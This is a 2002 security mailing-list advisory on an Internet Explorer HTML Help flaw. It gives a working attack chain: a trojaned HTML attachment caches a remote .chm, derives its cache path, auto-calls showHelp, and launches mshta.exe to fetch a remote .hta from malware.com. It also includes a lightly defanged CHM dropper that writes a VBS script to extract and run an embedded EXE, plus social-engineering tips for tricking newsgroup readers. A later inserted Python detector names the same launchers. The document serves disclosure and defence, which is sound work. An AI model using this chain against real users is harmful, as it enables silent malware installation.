[NT] Default HELP System of Internet Explorer Allows Arbitrary Code Execution

From: support@securiteam.com
Date: 02/11/02


From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 11 Feb 2002 23:00:37 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Default HELP System of Internet Explorer Allows Arbitrary Code Execution
------------------------------------------------------------------------

SUMMARY

Default installations of Internet Explorer 5.5 and 6.0 are vulnerable to
an attack that allows attackers to execute files on a target computer,
using technically trivial silent delivery and installation of an
executable.

DETAILS

In the newer versions of Internet Explorer, nothing in the Temporary
Internet Files folder can be activated unless the full path name is known,
both for the showHelp call and for the Click() on our link. Nevertheless,
we are able to retrieve our Trojaned HTML from the Temporary Internet Files
folder, determine its location, write that location into our showHelp
call, and thereafter execute our remote link.

How to recreate:
Create a very simple *.html file like so:

 <bgsound src="http://www.example.com/malware.chm">

This will pull our *.chm into the Temporary Internet Files folder.

Then include the Guninski scripting to determine the location of our
*.html file like so:

 malware=document.URL;
 path=malware.substr(-0,malware.lastIndexOf("\\"));
 path=unescape(path);

Then take that location information and write it to a simple HTML form
like so:

 document.write('<FORM name="malware"
ACTION="javascript:window.showHelp(document.forms[0].elements[0].value)">');
 document.write('<form><input type="hidden" size="40" maxlength="80"
 value="'+path+'\\malware[1].chm"></form>');

Technical note: it seems the myriad of patching to date does not make it
possible to pass the location directly to the showHelp call. It must be
written to the form which can then be automatically submitted:

 setTimeout('document.malware.submit()',5000);

Before we do all that we create our very simple malware.chm and include
our link object like so:

 C:\WINDOWS\SYSTEM\Mshta.exe,http://www.malware.com/foobar.hta

This is particularly interesting as we are able to pass a link to the
mshta.exe, which in turn will open from the remote site our *.hta that
includes our executable. All of this without a single warning.

Technical note: the entire process above can very likely be repeated
directly inside the *.chm file, dropping an *.exe from within the *.chm
into the same Temporary Internet Files folder: use our Guninski scripting
to determine the location of the *.chm, write that location into the link
parameter within it (value="'+path+'\\malware[1].exe">), and execute it.

So what happens?
We construct our trojaned HTML file and send it off to our target
computer, via mail or news. The recipient receives the message with the
attached *.html file. We then convince our unsuspecting recipient to open
the *.html. This should be quite trivial, particularly in news, as the
attached file is nothing more than a 500-byte HTML file.

Consider the following scenario in your favorite web design news group
(note: there is a hardened security warning when attempting to open an
attached *.html file; however, our call for assistance coupled with
nothing more than a legitimate *.html file should prove more than
tempting):

Screen shot: http://www.malware.com/duh.png (18KB)

Why does it happen?
Because our simple *.html file is an attachment, the mail or news client
transfers it to the Temporary Internet Files folder and opens it there
under the browser's security settings. However, precisely because it is
physically opened within the TIF, we can use our Guninski scripting to
determine its exact location, write that location into our form, and call
our *.chm, which resides there too.

Working Example (includes a harmless *.exe; the *.chm is hard-coded for
Win98):

 http://www.malware.com/help!.zip

Solution:
1. Beware of "innocent" *.html files in mail and news
2. Disable Active Scripting and Active X controls
3. Disable the HHCtrl ActiveX control (see
http://www.kb.cert.org/vuls/id/25249)
4. Disable or Remove Mshta.exe (although if an .exe file is embedded
directly into the *.chm then this has no impact)

Proof of concept on a CHM EXE dropper:
To prevent accidental exploitation, a few characters have been replaced in
the code below:

Flow of events:
1) CHM opens
     a) Determines absolute path current folder
     b) Determines parent chm name (in case cached changes name)
     c) Detects WinNT or Win98 to work on both

2) The CHM name is used to auto-generate a VBS script; the absolute paths
are used to auto-generate the HTML shortcut objects, and a script writes
the dynamically generated content to the window.

3) The first object is activated programmatically, echoing the VBS script
into existence in the same folder as the parent CHM file.

4) After waiting 1 sec, the second object activates echoed.vbs; this VBS
file reads the parent .CHM from a fixed offset and extracts a hello-world
EXE that has been appended onto the CHM file.

5) Once the EXE has been written to disk, the VBS script activates it.

Code:
funct!on getChmAbsPath(){
     t=unescape(location.href)
     return t.substring(t.indexOf(":",4)+1,t.lastIndexOf("\\")+1)
}

funct!on getChmName(){
l=unescape(location.href)
chmName=l.substring(l.lastIndexOf("\\")+1,l.lastIndexOf(":")-1)
t='Chr(92)+'
for(i=0;i<chmName.length;i++){
    t+= 'Chr(' + chmName.charCodeAt(i) + ')+'
}
return t.substring(0,t.length-1);
}

funct!on getInterpreter(){
    if(navigator.userAgent.indexOf('NT') > 0){
       return 'cmd';
    }else{
       return 'command';
    }
}

vbs='fso=Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+
Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+
Chr(109)+Chr(111)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116):'+
'wsc=Chr(119)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+
Chr(104)+Chr(101)+Chr(108)+Chr(108):'+
    
'exename=Chr(92)+Chr(101)+Chr(120)+Chr(116)+Chr(114)+Chr(97)+Chr(99)+Chr(116)+Chr(46)+
Chr(101)+Chr(120)+Chr(101):'+
    'set i=createobject(fso):'+
    'set o=createobject(fso):'+
    'set w=createobject(wsc):'+
    'pf=i.GetParentFolderName(WSCript.ScriptFullName):'+
    'infile=pf+' + getChmName() + ':'+
    'outfile=pf+exename:'+
    'OFFSET=XXXXXXX:'+
    'Set ii=i.OpenTextFile(infile):'+
    'Set oo=o.OpenTextFile(outfile,2,True):'+
    'ii.Read OFFSET:'+
    'While Not ii.AtEndOfStream:'+
    'oo.Write Chr(Asc(ii.Read(1))):'+
    'Wend:ii.close:oo.close:'+
    'w.Run chr(34)+outfile+chr(34)'

hit='<OBJECT id=shortcut^ type="application/x-oleobject" '+
    'classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" '+
    'codebase="hhctrl.ocx\#Version=4,72,8252,0" width=100 '+
    'height=100><PARAM name="Command" value="ShortCut"> '+
    '<PARAM name="Text" value="Text: "> '+
    '<PARAM name="Item1" value=\',*\'> '+
    '<PARAM name="Item2" value="273,1,1"></OBJECT> '

scriptPath = getChmAbsPath() + 'echoed.vbs'

cmd=new Array
cmd[1]= getInterpreter() + ',/c echo ' + vbs + ' > "' + scriptPath + '"'
cmd[2]='wscript,"' + scriptPath + '"'

funct!on replace(h,i,c){
h = h.split('^').join(i).split('*').join(c)
    return h
}

hit1=replace(hit,1,cmd[1])
hit2=replace(hit,2,cmd[2])

document.write(hit1+hit2+msg)
shortcut1.Click()
setTimeout("shortcut2.Click()",1000)
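A defender-side check for the two delivery patterns described in this advisory (the trojaned *.html that caches a *.chm and hands its Temporary Internet Files path to showHelp, and the CHM page that uses the HHCtrl ShortCut command to launch mshta/cmd/wscript). This is an added example, not code from the advisory or its authors: the rule names, the scoring thresholds and the sample inputs are my own constructions; the HHCtrl CLSID and the mshta.exe launch string are taken from the advisory text above.

```python
import re

# Constructed sample (not the advisory's own file) of the trojaned HTML the
# advisory describes: <bgsound> caches a .chm, script derives the TIF path,
# and an auto-submitted form hands that path to window.showHelp().
TROJANED_HTML = r'''<html><body>
<bgsound src="http://www.example.com/malware.chm">
<script>
malware=document.URL;
path=malware.substr(-0,malware.lastIndexOf("\\"));
path=unescape(path);
document.write('<FORM name="malware" ACTION="javascript:window.showHelp(document.forms[0].elements[0].value)">');
document.write('<form><input type="hidden" value="'+path+'\\malware[1].chm"></form>');
setTimeout('document.malware.submit()',5000);
</script>
</body></html>'''

# Constructed sample of a CHM-embedded page using the HHCtrl ShortCut command
# (CLSID and launch string as quoted in the advisory) to start mshta.exe.
CHM_PAGE = r'''<OBJECT id=shortcut1 type="application/x-oleobject"
 classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
 codebase="hhctrl.ocx#Version=4,72,8252,0" width=100 height=100>
<PARAM name="Command" value="ShortCut">
<PARAM name="Text" value="Text: ">
<PARAM name="Item1" value=",C:\WINDOWS\SYSTEM\Mshta.exe,http://www.malware.com/foobar.hta">
<PARAM name="Item2" value="273,1,1">
</OBJECT>'''

# Constructed benign page: a <bgsound> alone (pointing at a .mid) is not an indicator.
BENIGN_HTML = '<html><body><p>Release notes</p><bgsound src="intro.mid"></body></html>'

HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"  # HHCtrl.ocx, from the advisory

# Each rule is (indicator name, compiled regex). Names are hypothetical labels.
RULES = [
    # <bgsound> whose src is a compiled help file: the cache-priming trick
    ("bgsound_chm", re.compile(r'<bgsound[^>]+src\s*=\s*["\']?[^"\'>\s]+\.chm', re.I)),
    # any call into the HTML Help system from script
    ("showhelp_call", re.compile(r'showHelp\s*\(', re.I)),
    # the "Guninski scripting": own URL sliced at the last backslash to get the TIF path
    ("tif_path_derivation",
     re.compile(r'(document\.URL|location\.href)[\s\S]{0,200}lastIndexOf\(\s*"\\\\"', re.I)),
    # a timer that submits a form without user interaction
    ("auto_submit", re.compile(r'setTimeout\([^)]*\.submit\(\)', re.I)),
    # an <OBJECT> instantiating the HHCtrl ActiveX control
    ("hhctrl_object", re.compile(r'classid\s*=\s*["\']?clsid:' + HHCTRL_CLSID, re.I)),
    # the HHCtrl ShortCut command, which runs an external program
    ("hhctrl_shortcut",
     re.compile(r'<PARAM[^>]+name\s*=\s*["\']?Command["\']?[^>]+value\s*=\s*["\']?ShortCut', re.I)),
]

# ShortCut ItemN values carry "window,program,parameters"; flag script/shell launchers.
ITEM_PARAM = re.compile(r'<PARAM[^>]+name\s*=\s*["\']?Item\d+["\']?[^>]+value\s*=\s*["\']([^"\']*)', re.I)
LAUNCHER_RE = re.compile(r'(^|[\\/,\s])(mshta|cmd|command|wscript|cscript)(\.exe)?\b', re.I)


def scan(content: str) -> list[str]:
    """Return the indicator names found in one HTML or CHM page body."""
    hits = [name for name, rx in RULES if rx.search(content)]
    for m in ITEM_PARAM.finditer(content):
        if LAUNCHER_RE.search(m.group(1)):
            hits.append("hhctrl_launcher")
            break
    return hits


def verdict(content: str) -> str:
    """block: the full chain is present; review: partial indicators; allow: none."""
    hits = scan(content)
    if "hhctrl_launcher" in hits or {"bgsound_chm", "showhelp_call"} <= set(hits):
        return "block"
    if hits:
        return "review"
    return "allow"


if __name__ == "__main__":
    for label, sample in (("trojaned html", TROJANED_HTML),
                          ("chm page", CHM_PAGE),
                          ("benign html", BENIGN_HTML)):
        print(f"{label:14s} {verdict(sample):7s} {scan(sample)}")
```

The two strong signals are deliberately kept separate: a ShortCut item naming a launcher is enough on its own to block a CHM, whereas on the HTML side the .chm cache-priming and the showHelp call must appear together, since either one has legitimate uses in help content. The verdict is meant for a mail or news gateway inspecting *.html attachments, which is the delivery path the advisory describes.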

ADDITIONAL INFORMATION

The information has been provided by Malware and dzzie (dzzie@yahoo.com).

